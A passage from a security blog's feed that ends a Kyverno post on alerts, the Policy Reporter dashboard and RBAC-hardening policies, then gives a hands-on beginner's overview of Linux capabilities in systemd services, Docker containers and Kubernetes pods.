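<p>To close the loop, you can hang an alert off these metrics. Here’s a minimal <code>PrometheusRule</code> sketch — the resource name and threshold are my own placeholders, and the <code>release: kube-prom</code> label must match your Prometheus CR’s rule selector, just like the ServiceMonitor:</p>

```yaml
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
  name: kyverno-alerts            # hypothetical name
  namespace: monitoring
  labels:
    release: kube-prom            # must match the Prometheus CR's ruleSelector
spec:
  groups:
    - name: kyverno
      rules:
        - alert: KyvernoPolicyFailures
          expr: sum(increase(kyverno_policy_results_total{rule_result="fail"}[5m])) > 0
          for: 5m
          labels:
            severity: warning
          annotations:
            summary: Kyverno policies are reporting failures
```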
<hr />
<h2 id="heading-policy-reporter-your-friendly-dashboard">Policy Reporter – Your Friendly Dashboard</h2>
<p>For the finale, let’s spin up a dashboard. No Grafana this time — we’ll use the adjacent project <a target="_blank" href="https://kyverno.github.io/policy-reporter-docs/">Policy Reporter</a>.</p>
<h3 id="heading-setup">Setup</h3>
<p>Deploy with Helm:</p>
<pre><code class="lang-bash">helm repo add policy-reporter https://kyverno.github.io/policy-reporter
helm repo update
helm install policy-reporter policy-reporter/policy-reporter --create-namespace -n policy-reporter --<span class="hljs-built_in">set</span> ui.enabled=<span class="hljs-literal">true</span>
</code></pre>
<p>Expose it via NodePort:</p>
<pre><code class="lang-bash">kubectl patch -n policy-reporter svc policy-reporter-ui -p <span class="hljs-string">'{"spec": {"type": "NodePort"}}'</span>
kubectl get svc -n policy-reporter policy-reporter-ui -o wide
</code></pre>
<p>Now hit it in your browser just like Prometheus, e.g. <code>http://192.168.64.7:31864/</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1755576314555/d5e66ef6-0d42-43b2-99cf-b6d6d05d5a1f.png" alt class="image--center mx-auto" /></p>
<p>You’ll see a clean UI with policy passes, failures, and violations grouped by rule and namespace.
Instant dashboards for your Kyverno policies. Turns out not all dashboards are evil after all.</p>
<hr />
<h2 id="heading-borrowing-from-the-upstream-policy-library">Borrowing from the Upstream Policy Library</h2>
<p>Kyverno ships with an extensive <a target="_blank" href="https://kyverno.io/policies/">policy library</a> you can pull from for quick, high-impact wins. Instead of writing every rule yourself, lean on what’s already been proven. A few highlights worth adopting right away:  </p>
<ul>
<li><p><strong>Restrict automounting service account tokens</strong><br /><a target="_blank" href="https://kyverno.io/policies/other/restrict-sa-automount-sa-token/restrict-sa-automount-sa-token/">Policy link</a><br />Prevents workloads from automatically mounting a service account token unless explicitly allowed. Cuts down on “accidental” privilege handouts.  </p>
</li>
<li><p><strong>Block cluster-admin role bindings</strong><br /><a target="_blank" href="https://kyverno.io/policies/other/restrict-binding-clusteradmin/restrict-binding-clusteradmin/">Policy link</a><br />Stops developers (or attackers) from casually granting themselves cluster-admin. Because least privilege means <em>least</em>. </p>
</li>
<li><p><strong>Deny role escalation verbs</strong><br /><a target="_blank" href="https://kyverno.io/policies/other/restrict-escalation-verbs-roles/restrict-escalation-verbs-roles/">Policy link</a><br />Prevents roles from including verbs like <code>escalate</code> or <code>impersonate</code> that let users jump trust boundaries.  </p>
</li>
<li><p><strong>Ban wildcard verbs in roles</strong><br /><a target="_blank" href="https://kyverno.io/policies/other/restrict-wildcard-verbs/restrict-wildcard-verbs/">Policy link</a><br />Avoids the dreaded <code>*</code> in RBAC rules. Force teams to think about what permissions they actually need, rather than granting everything by default.  </p>
</li>
</ul>
<p>Each of these tackles real-world abuse paths we’ve seen exploited. They’re a fast way to raise the floor on cluster security without spending weeks hand-crafting policies.  </p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>We’ve covered a lot of ground in this trilogy.  </p>
<p>In <a target="_blank" href="https://cloudsecburrito.com/control-issues-tales-of-kubernetes-admission">Part 1</a>, we got down to the nitty-gritty of raw admission control — even wiring up our own admission controller. We also looked at Pod Security Admission, Kubernetes’ built-in controller that’s… let’s just say, not exactly the sharpest tool in the shed.  </p>
<p>In <a target="_blank" href="https://cloudsecburrito.com/control-issues-real-policies-in-minutes-with-kyverno">Part 2</a>, we dove into Kyverno itself. We covered the different policy types and ran through concrete, working examples.  </p>
<p>This series coincided with my <a target="_blank" href="https://www.youtube.com/watch?v=6ZgnzCzz5gs&amp;t=8s">BSides Las Vegas talk</a> (jump to ~17:13 if you want to watch me sweat through slides). I picked Kyverno partly because of that talk, but mostly because I genuinely believe admission control should be mandatory in any Kubernetes cluster.  </p>
<p>I haven’t given Gatekeeper or jsPolicy their fair shake yet, but I will. I started here because Kyverno is approachable, all YAML, and still powerful. Between the CLI, policy types, and extra tooling like dashboards, it gives you everything you need to get real work done. You don’t need to gold-plate everything to be effective; Kyverno strikes a good balance between power and usability.  </p>
<p>The time you invest in Kyverno will pay off. Big time. And with that, after three posts, one conference talk, and far too much self-flattery, we can finally call it a wrap.  </p>
]]></content:encoded></item><item><title><![CDATA[Linux Capabilities: A Beginner's Overview]]></title><description><![CDATA[Over the past few months, I’ve been testing root and non-root containers. Naturally, that led me deep into the Kubernetes securityContext: options for both pods and containers. There’s a lot packed into that field. And a handful of particularly inter...]]></description><link>https://cloudsecburrito.com/linux-capabilities-a-beginners-overview</link><guid isPermaLink="true">https://cloudsecburrito.com/linux-capabilities-a-beginners-overview</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Linux]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><category><![CDATA[capabilities]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 11 Aug 2025 23:29:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1754947179650/32c806d0-9164-4591-b4bd-05d68696b168.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Over the past few months, I’ve been testing root and non-root containers. Naturally, that led me deep into the Kubernetes <code>securityContext:</code> options for both pods and containers. There’s a lot packed into that field. And a handful of particularly interesting knobs that stand out:</p>
<ul>
<li>Linux Security Modules (LSMs)  </li>
<li>Capabilities  </li>
<li>Seccomp  </li>
</ul>
<p>But here’s the thing: all of these are <strong>just Linux</strong>. Kubernetes is merely surfacing functionality the kernel has had for decades.</p>
<p>I’ve already gone down the <a target="_blank" href="https://cloudsecburrito.com/kubernetes-runtime-enforcement-with-kubearmor">LSM rabbit hole</a>. In that post, I focused on AppArmor. And for now, I’m resisting the urge to dive into SELinux or SMACK. So let’s call that part of the journey complete for now.</p>
<p>Now it’s time to explore <strong>Linux capabilities</strong>. They’re surprisingly simple once you understand the model. You can dive deep in the <a target="_blank" href="https://man7.org/linux/man-pages/man7/capabilities.7.html">man page</a>. It starts like this:</p>
<blockquote>
<p>“Traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero).<br />Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials.”</p>
</blockquote>
<p>So where do capabilities come into play?</p>
<blockquote>
<p>“Starting with Linux 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities.”</p>
</blockquote>
<p>And you can see the difference right in the kernel source.<br />In Linux <strong>2.0.40</strong>, there’s <a target="_blank" href="https://elixir.bootlin.com/linux/2.0.40/source/fs/open.c">no mention of capabilities at all</a> — just hardcoded UID checks like <code>if (!suser()) return -EPERM;</code>. But by Linux <strong>2.2.22</strong>, <a target="_blank" href="https://elixir.bootlin.com/linux/2.2.22/source/fs/open.c"><code>fs/open.c</code></a> has been rewritten to use checks like <code>!capable(CAP_SYS_CHROOT)</code>, showing the shift to fine-grained privilege control.</p>
<p>So here's the reality. In modern Linux, we shouldn’t limit risk management to <code>root</code> alone, because <strong>privilege isn’t binary anymore</strong>.  It’s been split into a collection of discrete powers, each represented by a <strong>capability</strong>. And if you don’t understand which ones your process holds, you might not fully understand what it can actually do.</p>
<p>For example:</p>
<ul>
<li><code>CAP_NET_RAW</code>: allow raw sockets</li>
<li><code>CAP_SYS_ADMIN</code>: let's say <a target="_blank" href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/capability.h#L243-L279">a lot</a></li>
<li><code>CAP_SYS_PTRACE</code>: ptrace() of any process</li>
<li><code>CAP_DAC_OVERRIDE</code>: override all DAC access</li>
</ul>
<p>Security should involve an understanding of what your workloads are <em>already allowed</em> to do, and what the kernel will or won’t stop. Let’s talk about Linux capabilities. </p>
<hr />
<h2 id="heading-what-are-linux-capabilities-really">What Are Linux Capabilities, Really?</h2>
<p>Before Linux had capabilities, privilege was binary: either you were <code>root</code> (UID 0) and could do everything, or you weren’t and got <code>EPERM</code>. Every privileged syscall like <code>mount()</code>, <code>ptrace()</code>, or <code>chown()</code> used a hardcoded UID check. Capabilities don’t prevent a process from making a syscall, but they do decide whether the kernel <em>allows it to succeed</em>.</p>
<h3 id="heading-deep-dive">Deep Dive</h3>
<p>In pre-capabilities Linux (like <a target="_blank" href="https://elixir.bootlin.com/linux/2.0.40/source/kernel/sys.c#L292-L305">2.0.40</a>), the logic behind privileged syscalls like <code>setgid()</code> was straightforward:</p>
<pre><code class="lang-c"><span class="hljs-function">asmlinkage <span class="hljs-keyword">int</span> <span class="hljs-title">sys_setgid</span><span class="hljs-params">(<span class="hljs-keyword">gid_t</span> gid)</span>
</span>{
    <span class="hljs-keyword">int</span> old_egid = current-&gt;egid;

    <span class="hljs-keyword">if</span> (suser())
        current-&gt;gid = current-&gt;egid = current-&gt;sgid = current-&gt;fsgid = gid;
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ((gid == current-&gt;gid) || (gid == current-&gt;sgid))
        current-&gt;egid = current-&gt;fsgid = gid;
    <span class="hljs-keyword">else</span>
        <span class="hljs-keyword">return</span> -EPERM;
    <span class="hljs-keyword">if</span> (current-&gt;egid != old_egid)
        current-&gt;dumpable = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>So if you were root, you could change your group IDs freely. If not, you could only change your effective group ID to match your real or saved group. Otherwise? You got a good old-fashioned <code>-EPERM</code>.</p>
<p>Fast forward to <a target="_blank" href="https://elixir.bootlin.com/linux/2.2.24/source/kernel/sys.c#L292-L306">2.2.24</a> and the logic is still simple; it just swaps the superuser check for a capability check:</p>
<pre><code class="lang-c"><span class="hljs-function">asmlinkage <span class="hljs-keyword">int</span> <span class="hljs-title">sys_setgid</span><span class="hljs-params">(<span class="hljs-keyword">gid_t</span> gid)</span>
</span>{
    <span class="hljs-keyword">int</span> old_egid = current-&gt;egid;

    <span class="hljs-keyword">if</span> (capable(CAP_SETGID))
        current-&gt;gid = current-&gt;egid = current-&gt;sgid = current-&gt;fsgid = gid;
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ((gid == current-&gt;gid) || (gid == current-&gt;sgid))
        current-&gt;egid = current-&gt;fsgid = gid;
    <span class="hljs-keyword">else</span>
        <span class="hljs-keyword">return</span> -EPERM;

    <span class="hljs-keyword">if</span> (current-&gt;egid != old_egid)
        current-&gt;dumpable = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>Fast forward to the <a target="_blank" href="https://elixir.bootlin.com/linux/v6.16/source/kernel/sys.c">newest version</a> and it gets more complicated, so we'll avoid that.</p>
<h3 id="heading-the-root-problem">The Root Problem</h3>
<p>The old model had no concept of “just enough privilege.” If you wanted to let a program:</p>
<ul>
<li>Bind to a port below 1024 (<code>bind()</code>)</li>
<li>Run <code>ping</code> (requires raw socket access)</li>
<li>Trace another process (<code>ptrace()</code>)</li>
</ul>
<p>You had to give it full root, which meant total control over the system. Not ideal.</p>
<h3 id="heading-available-capabilities">Available Capabilities</h3>
<p>There are currently 41 capabilities in Linux, documented in two places:</p>
<ul>
<li><a target="_blank" href="https://man7.org/linux/man-pages/man7/capabilities.7.html"><code>man 7 capabilities</code></a> - human-readable descriptions</li>
<li><a target="_blank" href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/capability.h"><code>include/uapi/linux/capability.h</code></a> - actual definitions in the kernel</li>
</ul>
<p>Example from the header file:</p>
<pre><code class="lang-c"><span class="hljs-comment">/* Allow ioperm/iopl access */</span>
<span class="hljs-comment">/* Allow sending USB messages to any device via /dev/bus/usb */</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> CAP_SYS_RAWIO        17</span>

<span class="hljs-comment">/* Allow use of chroot() */</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> CAP_SYS_CHROOT       18</span>

<span class="hljs-comment">/* Allow ptrace() of any process */</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> CAP_SYS_PTRACE       19</span>
</code></pre>
<p>These header definitions are used throughout the kernel wherever permission checks are needed. You’ll see them pop up in everything from <code>mount()</code> to <code>chroot()</code>. </p>
<h3 id="heading-more-than-just-on-or-off">More Than Just On or Off</h3>
<p>Capabilities aren’t just a binary “has it / doesn’t have it.”  When a process runs, the kernel keeps several <strong>capability sets</strong> that define not only what’s possible, but what’s actually in effect. Here’s a high-level overview of each:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Set</td><td>What It Controls                                               </td></tr>
</thead>
<tbody>
<tr>
<td><strong>Permitted</strong></td><td>The menu of capabilities the process <em>may</em> make effective or inheritable.</td></tr>
<tr>
<td><strong>Effective</strong></td><td>The subset currently in use: what the process is actively wielding right now.</td></tr>
<tr>
<td><strong>Inheritable</strong></td><td>Capabilities the process can pass along to child processes during <code>execve()</code>.</td></tr>
<tr>
<td><strong>Bounding</strong></td><td>The hard ceiling: if a capability isn’t here, it can never be granted later, even to root.</td></tr>
<tr>
<td><strong>Ambient</strong></td><td>Lets certain capabilities stick around across <code>execve()</code> for non-root processes.</td></tr>
</tbody>
</table>
</div><p>You can check a running process’s capabilities with:</p>
<pre><code class="lang-bash">grep Cap /proc/$$/status
</code></pre>
<p>For a friendlier view (with names instead of hex):</p>
<pre><code class="lang-bash">capsh --<span class="hljs-built_in">print</span>
</code></pre>
<hr />
<h2 id="heading-practical-example-with-capnetbindservice">Practical Example with <code>CAP_NET_BIND_SERVICE</code></h2>
<p>Let's walk through capabilities with low-port binding. We'll create a service that tries to bind to a port below 1024, starting with a simple C app called <code>bind_low_port</code>. It only attempts the bind; nothing persistent runs. Here is the app:</p>
<pre><code class="lang-c"><span class="hljs-comment">// bind_low_port.c</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;string.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;unistd.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;errno.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;netinet/in.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/socket.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{
    <span class="hljs-keyword">int</span> sockfd;
    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">sockaddr_in</span> <span class="hljs-title">addr</span>;</span>

    sockfd = socket(AF_INET, SOCK_STREAM, <span class="hljs-number">0</span>);
    <span class="hljs-keyword">if</span> (sockfd == <span class="hljs-number">-1</span>) {
        perror(<span class="hljs-string">"socket"</span>);
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }

    <span class="hljs-built_in">memset</span>(&amp;addr, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(<span class="hljs-number">80</span>); <span class="hljs-comment">// Privileged port (&lt;1024)</span>

    <span class="hljs-keyword">if</span> (bind(sockfd, (struct sockaddr *)&amp;addr, <span class="hljs-keyword">sizeof</span>(addr)) &lt; <span class="hljs-number">0</span>) {
        perror(<span class="hljs-string">"bind"</span>);
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Successfully bound to port 80\n"</span>);
    close(sockfd);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>Go ahead and compile that and drop it into <code>/usr/local/bin</code>:</p>
<pre><code class="lang-sh">sudo gcc -o /usr/<span class="hljs-built_in">local</span>/bin/bind_low_port bind_low_port.c
sudo chmod +x /usr/<span class="hljs-built_in">local</span>/bin/bind_low_port
</code></pre>
<p>Now the app is ready to go!</p>
<h3 id="heading-run-as-root">Run as Root</h3>
<p>Now let's rewind to the pre-capabilities days. We need to make sure we are root to get this to work so let's create a service to run as root! Save the following as <code>bind-root.service</code>.</p>
<pre><code class="lang-bash">[Unit]
Description=Bind to port 80 as root

[Service]
ExecStart=/usr/<span class="hljs-built_in">local</span>/bin/bind_low_port
User=root

[Install]
WantedBy=multi-user.target
</code></pre>
<p>Copy it into our <code>systemd</code> directory, enable it, start it, and check status:</p>
<pre><code class="lang-bash">sudo cp bind-root.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-root.service
sudo systemctl status bind-root
</code></pre>
<p>And you should see:</p>
<pre><code class="lang-bash">○ bind-root.service - Bind to port 80 as root
     Loaded: loaded (/etc/systemd/system/bind-root.service; disabled; preset: enabled)
     Active: inactive (dead)

Aug 08 20:32:52 controlplane systemd[1]: Started bind-root.service - Bind to port 80 as root.
Aug 08 20:32:52 controlplane bind_low_port[2400223]: Successfully bound to port 80
Aug 08 20:32:52 controlplane systemd[1]: bind-root.service: Deactivated successfully.
</code></pre>
<p>Worked as expected, but not a desirable permission level.</p>
<h3 id="heading-run-with-net-bind-capability">Run with Net Bind Capability</h3>
<p>Now let's get to the capabilities world. We no longer need root! Save the following as a <code>bind-captest.service</code>.</p>
<pre><code class="lang-bash">[Unit]
Description=Bind to port 80 with CAP_NET_BIND_SERVICE

[Service]
ExecStart=/usr/<span class="hljs-built_in">local</span>/bin/bind_low_port
User=captest
Group=captest
AmbientCapabilities=CAP_NET_BIND_SERVICE
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
NoNewPrivileges=<span class="hljs-literal">true</span>

[Install]
WantedBy=multi-user.target
</code></pre>
<p>We'll need to create this non-privileged user and group. </p>
<pre><code class="lang-bash">sudo groupadd --system captest
sudo useradd --system --no-create-home --gid captest captest
</code></pre>
<p>Copy it into your <code>systemd</code> directory, enable it, start it, and check status:</p>
<pre><code class="lang-bash">sudo cp bind-captest.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-captest.service
sudo systemctl status bind-captest
</code></pre>
<p>And you should see:</p>
<pre><code class="lang-bash">○ bind-captest.service - Bind to port 80 with CAP_NET_BIND_SERVICE
     Loaded: loaded (/etc/systemd/system/bind-captest.service; disabled; preset: enabled)
     Active: inactive (dead)

Aug 08 20:21:13 controlplane systemd[1]: bind-captest.service: Failed with result <span class="hljs-string">'exit-code'</span>.
Aug 08 20:22:13 controlplane systemd[1]: Started bind-captest.service - Bind to port 80 with CAP_NET_BIND_SERVICE.
Aug 08 20:22:13 controlplane bind_low_port[2392163]: Successfully bound to port 80
Aug 08 20:22:13 controlplane systemd[1]: bind-captest.service: Deactivated successfully
</code></pre>
<p>Worked as expected and with least privilege. Not too bad.</p>
<h3 id="heading-run-with-no-root-and-no-capability">Run with No Root and No Capability</h3>
<p>Again we'll create a service. Save the following as <code>bind-nonroot.service</code>.</p>
<pre><code class="lang-bash">[Unit]
Description=Bind to port 80 with no capabilities

[Service]
ExecStart=/usr/<span class="hljs-built_in">local</span>/bin/bind_low_port
User=captest
Group=captest
NoNewPrivileges=<span class="hljs-literal">true</span>

[Install]
WantedBy=multi-user.target
</code></pre>
<p>No need to create the user and group as we did that in the previous step. Copy it into our <code>systemd</code> directory, enable it, start it, and check status:</p>
<pre><code class="lang-bash">sudo cp bind-nonroot.service /etc/systemd/system/
sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl start bind-nonroot.service
sudo systemctl status bind-nonroot
</code></pre>
<p>And you should see:</p>
<pre><code class="lang-bash">× bind-nonroot.service - Bind to port 80 with no capabilities
     Loaded: loaded (/etc/systemd/system/bind-nonroot.service; disabled; preset: enabled)
     Active: failed (Result: exit-code) since Fri 2025-08-08 20:28:15 UTC; 11min ago
   Duration: 4ms
   Main PID: 2396701 (code=exited, status=1/FAILURE)
        CPU: 1ms

Aug 08 20:28:15 controlplane systemd[1]: Started bind-nonroot.service - Bind to port 80 with no capabilities.
Aug 08 20:28:15 controlplane bind_low_port[2396701]: <span class="hljs-built_in">bind</span>: Permission denied
Aug 08 20:28:15 controlplane systemd[1]: bind-nonroot.service: Main process exited, code=exited, status=1/FAILURE
Aug 08 20:28:15 controlplane systemd[1]: bind-nonroot.service: Failed with result <span class="hljs-string">'exit-code'</span>.
</code></pre>
<p>Failed just as expected. </p>
<p>So we hit the <em>trifecta</em>. No bonus payout, sadly. Here is a quick recap:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Service Type</td><td>Can Bind Port 80?</td><td>Privilege Level</td><td>Notes</td></tr>
</thead>
<tbody>
<tr>
<td>Root</td><td>Yes</td><td>Full root</td><td>Risky: has all powers</td></tr>
<tr>
<td>Non-root + Capability</td><td>Yes</td><td>Scoped via <code>CAP_NET_BIND_SERVICE</code></td><td>Just enough privilege</td></tr>
<tr>
<td>Non-root, No Capability</td><td>No</td><td>No elevated privileges</td><td>Expected failure (Permission denied)</td></tr>
</tbody>
</table>
</div><p>Now that we've laid the groundwork, let's dive into something near and dear.</p>
<hr />
<h2 id="heading-capabilities-in-container-land">Capabilities in Container Land</h2>
<h3 id="heading-docker-containers">Docker Containers</h3>
<p>By default, Docker containers run with a reduced set of <a target="_blank" href="https://docs.docker.com/engine/security/#linux-kernel-capabilities">capabilities</a>, but not empty. Let's create a simple Dockerfile that gives us some tools.</p>
<pre><code class="lang-Dockerfile"><span class="hljs-keyword">FROM</span> ubuntu:<span class="hljs-number">22.04</span>
<span class="hljs-keyword">RUN</span><span class="bash"> apt update &amp;&amp; apt install -y \
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    &amp;&amp; apt clean</span>
</code></pre>
<p>Then create and run in interactive mode:</p>
<pre><code class="lang-bash">docker build -t captest .
docker run --rm -it captest
</code></pre>
<p>Now let's check our capabilities.</p>
<pre><code class="lang-bash">root@12801a8bb3a8:/<span class="hljs-comment"># capsh --print</span>
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding <span class="hljs-built_in">set</span> =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient <span class="hljs-built_in">set</span> =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)
</code></pre>
<p>You’ll see things like <code>CAP_NET_BIND_SERVICE</code>, <code>CAP_CHOWN</code>, and <code>CAP_DAC_OVERRIDE</code> still available.</p>
<p>Test something allowed such as <code>CAP_CHOWN</code>:</p>
<pre><code class="lang-bash">root@12801a8bb3a8:/<span class="hljs-comment"># touch testfile &amp;&amp; chown nobody:nogroup testfile &amp;&amp; ls</span>
bin  boot  dev  etc  home  lib  media  mnt  opt  proc  root  run  sbin  secret  srv  sys  testfile  tmp  usr  var
</code></pre>
<p>Test something not allowed such as <code>CAP_NET_ADMIN</code>:</p>
<pre><code class="lang-bash">root@12801a8bb3a8:/<span class="hljs-comment"># ip link add dummy0 type dummy</span>
RTNETLINK answers: Operation not permitted
</code></pre>
<p>Exit the container and we can try to drop and add a capability.</p>
<pre><code class="lang-bash">docker run --rm -it --cap-drop=CHOWN --cap-add=CAP_NET_ADMIN captest
</code></pre>
<p>And now the capabilities have switched:</p>
<pre><code class="lang-bash">root@2d6de2b45347:/<span class="hljs-comment"># touch file</span>
root@2d6de2b45347:/<span class="hljs-comment"># chown nobody file</span>
chown: changing ownership of <span class="hljs-string">'file'</span>: Operation not permitted
root@2d6de2b45347:/<span class="hljs-comment"># ip link add dummy0 type dummy</span>
root@2d6de2b45347:/<span class="hljs-comment">#</span>
</code></pre>
<p>That all worked as expected. We've seen the defaults and shown how to add and drop capabilities. </p>
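<p>Incidentally, you don’t strictly need <code>capsh</code> to inspect the sets; the raw bitmasks live in <code>/proc/self/status</code>, and a few lines of shell can decode the low bits. This is just a sketch, not the libcap implementation: the name table is truncated to the first eight capabilities for brevity (the full bit ordering lives in <code>linux/capability.h</code>):</p>
<pre><code class="lang-bash"># Decode the low bits of a hex capability mask (as seen in
# /proc/self/status CapEff) into names. Name table truncated for brevity;
# bit order follows linux/capability.h.
decode_caps() {
    mask=$((0x$1))
    out=""
    for n in cap_chown cap_dac_override cap_dac_read_search cap_fowner \
             cap_fsetid cap_kill cap_setgid cap_setuid; do
        if [ $((mask % 2)) -eq 1 ]; then
            out="${out:+$out }$n"
        fi
        mask=$((mask / 2))
    done
    echo "$out"
}

# Docker's default effective mask from the capsh output above:
decode_caps a80425fb
# cap_chown cap_dac_override cap_fowner cap_fsetid cap_kill cap_setgid cap_setuid
</code></pre>
<p>Note that <code>cap_dac_read_search</code> correctly does not appear: bit 2 of <code>0xfb</code> is zero, matching the default set.</p>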
<h3 id="heading-kubernetes-pods">Kubernetes Pods</h3>
<p>Let's try the same thing in <a target="_blank" href="https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-capabilities-for-a-container">Kubernetes</a>. Create the following pod definition:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cap-default</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">cap-default</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">ubuntu</span>
    <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>, <span class="hljs-string">"infinity"</span>]
</code></pre>
<p>Deploy the pod and exec in:</p>
<pre><code class="lang-bash">kubectl apply -f captest-pod.yaml
kubectl <span class="hljs-built_in">exec</span> -it cap-default -- /bin/bash
</code></pre>
<p>Install the relevant tools and check the capabilities. They will be as expected from our Docker experiment:</p>
<pre><code class="lang-bash">root@cap-default:/<span class="hljs-comment"># apt update &amp;&amp; apt install -y \</span>
    libcap2-bin \
    strace \
    util-linux \
    iproute2 \
    procps \
    net-tools \
    python3 \
    curl \
    &amp;&amp; apt clean
root@cap-default:/<span class="hljs-comment"># capsh --print</span>
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding <span class="hljs-built_in">set</span> =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient <span class="hljs-built_in">set</span> =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
Securebits: 00/0x0/1<span class="hljs-string">'b0 (no-new-privs=0)
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: HYBRID (4)</span>
</code></pre>
